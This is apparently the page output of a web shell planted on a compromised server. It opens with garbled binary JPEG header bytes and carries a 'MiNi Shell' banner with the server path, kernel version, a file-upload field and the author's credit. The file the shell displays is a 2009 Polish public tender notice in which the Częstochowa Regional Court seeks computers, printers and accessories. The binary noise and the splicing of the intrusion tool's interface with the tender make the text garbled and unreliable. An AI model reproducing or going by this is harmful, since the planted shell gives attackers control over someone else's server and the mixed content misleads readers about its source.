JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090428/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090428/67721-N-2009.html

<p class="kh_header"><b>Częstochowa: Dostawa sprzętu informatycznego tj. komputerów, drukarek i akcesoriów komputerowych do Sądu Okręgowego w Częstochowie</b><br>
<b>Numer ogłoszenia: 67721 - 2009; data zamieszczenia: 28.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Częstochowie , ul. Dąbrowskiego 23/35, 42-200 Częstochowa, woj. śląskie, tel. 034 3681696, faks 034 3644210.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu informatycznego tj. komputerów, drukarek i akcesoriów komputerowych do Sądu Okręgowego w Częstochowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia są dostawy - dostawa sprzętu informatycznego tj. komputerów, drukarek i akcesoriów komputerowych do Sądu Okręgowego w Częstochowie.

3.2.	Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2 do SIWZ - szczegółowy opis przedmiotu zamówienia - zadanie A - komputery i drukarki i zadanie B - akcesoria komputerowe,

Wykonawca winien zobowiązać się do jednorazowego odbioru zużytego sprzętu komputerowego w ilości nie większej od ilości sprzętu dostarczonego 
w wyniku realizacji niniejszego zamówienia publicznego, w terminie określo-nym przez Zamawiającego, w okresie 1 roku od dnia dostarczenia przedmiotu zamówienia.

3.3.	Wspólny słownik zamówień:
CPV: 	30200000-1 - urządzenia komputerowe 
30237000-9 - akcesoria komputerowe
3.4.	Zamawiający wymaga, aby dostarczony przedmiot zamówienia odpowiadał wymaganiom i parametrom opisanym w załączniku nr 2 część A i B do SIWZ.
3.5.	Zamawiający dopuszcza rozwiązania równoważne opisywanym 
w specyfikacji istotnych warunków zamówienia. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obo-wiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.
3.6.	Wymagany okres rękojmi na dostarczony przedmiot zamówienia:
3.6.1. zadanie A:
a) dla zestawów komputerowych stacjonarnych, opisanych w poz. 1.1. ; 1.2. i 1.3. załącznika nr 2 część A do niniejszej SIWZ, na okres 3 lat, 
b) dla drukarek laserowych, opisanych w poz. 2. załącznika nr 2 część A do niniej-szej SIWZ, na okres 2 lat, 
c) dla zestawów komputerowych typu (notebook), opisanych w poz. 1.4 załącznika nr 2 część A do niniejszej SIWZ, na okres 2 lat. 
d) Rękojmia rozpoczyna bieg od dnia podpisania protokołu odbioru towaru bez wad.  
e) O ile towar jest objęty gwarancją producenta, Wykonawca zobowiązany jest wydać Zamawiającemu dokument gwarancyjny przy wydaniu towaru. 
f) W przypadku wystąpienia wad w okresie rękojmi Wykonawca zobowiązuje się do ich usuwania w terminie 72 godzin od zgłoszenia, w odniesieniu do zestawów kom-puterowych stacjonarnych, drukarek laserowych i zestawów komputerowych typu (notebook).
g) Do biegu terminu usunięcia wady nie wlicza się sobót, niedziel oraz dni świątecz-nych. 
h) Jeżeli usunięcie wady we wskazanym w pkt. lit. f terminie nie będzie możliwe, ze względu na jej charakter lub złożoność, Wykonawca zawiadamia o tym w ciągu 48 (czterdzieści osiem) godzin od zgłoszenia wady Zamawiającego, w sposób przyjęty dla zgłoszenia wady z tytułu rękojmi, wskazując termin jej usunięcia. W takiej sytuacji Wykonawca zobowiązuje się na własny koszt dostarczyć towar zastępczy, którego parametry nie będą odbiegać od parametrów towaru przeznaczonego do naprawy. 
i) Wady towaru usuwane będą w miejscu ich eksploatacji. W przypadku, gdy usunię-cie wady w miejscu eksploatacji nie będzie możliwe Wykonawca dokona naprawy w innym miejscu. 
j) Wszelkie koszty konieczne do poniesienia w związku z wykonaniem obowiązków wynikających z rękojmi ciążą na Wykonawcy, bez prawa żądania ich zwrotu. 

3.6.2. zadanie B:
a) dla akcesoriów komputerowych, opisanych w poz. 1.1 ÷ 1.21 załącznika nr 2 część B do niniejszej SIWZ, na okres 2 lat, 
b) Rękojmia rozpoczyna bieg od dnia podpisania protokołu odbioru towaru bez wad.  
c) O ile towar jest objęty gwarancją producenta, Wykonawca zobowiązany jest wydać Zamawiającemu dokument gwarancyjny przy wydaniu towaru. 
d) W przypadku wystąpienia wad w okresie rękojmi Wykonawca zobowiązuje się do ich usuwania w następujących terminach:
- do 7 dni od zgłoszenia, w odniesieniu do akcesoriów komputerowych opisanych w poz. 1.1 ÷ 1.21 załącznika nr 2 część B do niniejszej SIWZ .
e) Do biegu terminu usunięcia wady nie wlicza się sobót, niedziel oraz dni świątecz-nych. 
f) Jeżeli usunięcie wady we wskazanym w ust. d) terminie nie będzie możliwe ze względu na jej charakter lub złożoność Wykonawca dostarczy nowe, sprawne urzą-dzenie w tym samym terminie.  
g) Wady towaru usuwane będą:
- w miejscu ich eksploatacji, a w przypadku, gdy usunięcie wady w miejscu eksplo-atacji nie będzie możliwe, Wykonawca dokona naprawy w innym miejscu, w odnie-sieniu do akcesoriów komputerowych, opisanych w poz. 1.1 ÷ 1.21 załącznika nr 2 część B do niniejszej SIWZ. 
h) Wszelkie koszty konieczne do poniesienia w związku z wykonaniem obowiązków wynikających z rękojmi ciążą na Wykonawcy, bez prawa żądania ich zwrotu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.70.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium w tym postępowaniu.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 8.1	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
-	posiadają niezbędne uprawnienia do wykonywania działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
-	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencja-łem technicznym i osobami zdolnymi do wykonania zamówienia;
-	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wyko-nanie zamówienia;
-	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego, na podstawie art. 24 ustawy
8.2	O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, których oferta odpowiada zasadom określonym w ustawie i spełnia wymagania okre-ślone w niniejszej SIWZ.  
8.3   	Wykonawca ubiegający się o zamówienie publiczne musi spełnić niżej wymienione warunki:
8.3.1.	wypełnić OFERTĘ z załącznikami; -  załącznik nr 1 do siwz
8.3.2.	posiadać odpowiednie doświadczenie zawodowe tj. wykonać w ciągu ostatnich trzech lat minimum jedno zadanie odpowiadające swoim ro-dzajem i wartością dostawie stanowiącej przedmiot zamówienia 
w zadaniu, na które Wykonawca składa ofertę. 
NA POTWIERDZENIE TEGO WARUNKU NALEŻY:
załączyć wykaz wykonanych w ciągu ostatnich trzech lat dostaw zbliżo-nych co do zakresu i wartości  do dostaw objętych zamówieniem, wraz z dokumentami potwierdzającymi ich należyte wykonanie np. referencje -  załącznik nr 5 do siwz

8.4	Zamawiający oceni, czy Wykonawca spełnia warunki o których mowa w pkt. 8.1 - 8.3 na postawie złożonego wraz z ofertą oświadczenia o spełnieniu wa-runków udziału w postępowaniu i na podstawie złożonych wraz ofertą doku-mentów żądanych przez Zamawiającego, potwierdzających spełnienie tych warunków, o których mowa w SIWZ.
8.5	Jeżeli Wykonawca nie złoży oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub z treści dołączonych doku-mentów nie będzie wynikać, że zostały spełnione warunki określone 
w pkt. 8.1, to po nieskutecznym wezwaniu do uzupełnienia zgodnie z art. 26 ust. 3 ustawy, Zamawiający wykluczy Wykonawcę odpowiednio na podstawie art. 24 ust 1 i 2 ustawy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 9.1	Na ofertę składają się następujące dokumenty i załączniki:
-	wypełniony formularz ofertowy (oryginał) - załącznik nr 1 do siwz;
-	opisy przedmiotu zamówienia, uzupełnione, podpisane i ostemplowane przez Wykonawcę, sporządzone wg wzorów stanowiących załącznik nr  2 część A i B do  SIWZ. Wykonawca winien dołączyć do oferty opis przedmiotu zamówienia dotyczący zadania/ń, do którego(ych) przystępuje (oryginał). 

Zamawiający wymaga, a Wykonawca zobowiązany jest do wypełnienia każdego z punktów opisu oferowanego sprzętu zgodnie z opisem przedmiotu zamówienia i formularzami załączonymi do opisu.

-	oświadczenie wykonawcy przystępującego do udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy wg wzoru określonego w załączniku do specyfikacji istotnych warunków zamówienia (oryginał) - załącznik nr 4 do siwz;
-	oświadczenie dotyczące certyfikatów, posiadanych przez oferowany do sprzedaży sprzęt informatyczny. - załącznik nr 6 do siwz.

9.2. 	W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Zamawiający żąda załączenia do oferty następujących dokumentów:
-	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadcze-nia o wpisie do ewidencji dzia?łalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (oryginał lub kopia potwierdzona za zgodność z oryginałem).
-	aktualnych zaświadczeń  właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających od-powiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykona-nia decyzji właściwego organu - wystawionych nie wcześniej niż 3 mie-siące  przed upływem terminu składania ofert (oryginał lub kopia potwierdzona za zgodność z oryginałem).
-	aktualnej informacji z Krajowego Rejestru Karnego  albo równoważne-go zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia lub zamieszkania osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionych nie wcześniej niż 6 mie-sięcy przed upływem terminu składania ofert (oryginał lub kopia potwierdzona za zgodność z oryginałem), 
-	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy  wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (oryginał lub kopia potwierdzona za zgodność z oryginałem).
9.3. 	W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć następujące dokumenty: 
-	wykaz wykonanych w ciągu ostatnich trzech lat dostaw zbliżonych co do zakresu i wartości  do dostaw objętych zamówieniem (oryginał) - załącznik nr 5 do siwz, wraz z dokumentami potwierdzającymi ich należyte wykonanie (oryginał lub kopia potwierdzona za zgodność 
z oryginałem). 
9.4. 	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów  o których mowa w punkcie: 9.2, składa dokument, lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
-	nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie spo-łeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, od-roczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu.
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powy-żej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

9.5	Wymienione w tym rozdziale dokumenty mogą zostać złożone w oryginale lub kopii, potwierdzonej za zgodność z oryginałem przez przedstawiciela wykonawcy uprawnionego do podpisania oferty.
Zamawiający zażąda przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wtedy, gdy przedstawiona przez wykonawcę kserokopia do-kumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości, 
a zamawiający nie może sprawdzić jej autentyczności w inny sposób..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.czestochowa.so.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Dąbrowskiego 23/35
42-200 Częstochowa
pokoj nr 11.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2009 godzina 10:00, miejsce: ul. Dąbrowskiego 23/35
42-200 Częstochowa
pokoj nr 11.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com